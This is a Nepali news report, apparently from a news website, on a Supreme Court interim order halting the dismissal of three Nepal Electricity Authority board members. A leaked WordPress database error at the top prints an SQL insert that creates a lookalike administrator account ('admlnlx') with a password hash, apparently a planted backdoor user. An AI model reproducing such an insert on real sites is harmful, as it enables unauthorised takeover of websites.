WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BDcfxMwHyXd3TxydMfXWwKdrP/0AsU0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 18:09:56', '', 'admlnlx', 'admlnlx')
काठमाडौँ, पुस १३–
सर्वोच्च अदालतले नेपाल विद्युत् प्राधिकरणका सञ्चालकलाई तत्काल नहटाउन अल्पकालीन अन्तरिम आदेश जारी गरेको छ ।
न्यायाधीश प्रकाशमानसिंह राउतको एकल इजलासले आज यही पुस १९ गते दुवै पक्षलाई छलफलका लागि बोलाई त्यति बेलासम्मका लागि सञ्चालक समितिका सदस्यलाई नहटाउन अल्पकालीन अन्तरिम आदेश दिएको सर्वोच्च अदालतका सहप्रवक्ता विश्वराज पौडेलले जानकारी दिनुभयो ।
आदेशमा प्राधिकरणका सञ्चालक लक्ष्मण अग्रवाल, मनोज मिश्र र सुरज लामिछानेलाई किन हटाइएको हो सोको कारण देखाउन ऊर्जा मन्त्रालयका नाममा कारण देखाउसहित नहटाउन भनिएको छ ।
प्राधिकरणमा निर्देशक कुलमान घिसिङ नियुक्त भएपछि असहयोग गरेको भन्दै सञ्चालक सदस्यत्रय लक्ष्मण अग्रवाल, मनोज मिश्र र सुरज लामिछानेलाई यही पुस ३ गते बर्खास्त गरिएको थियो । बर्खास्त गरिएका तीन सञ्चालकले हिजो मङ्गलबार आफूहरुको बर्खास्तीविरुद्ध सर्वोच्चमा रिट निवेदन दर्ता गराउनुभएको थियो ।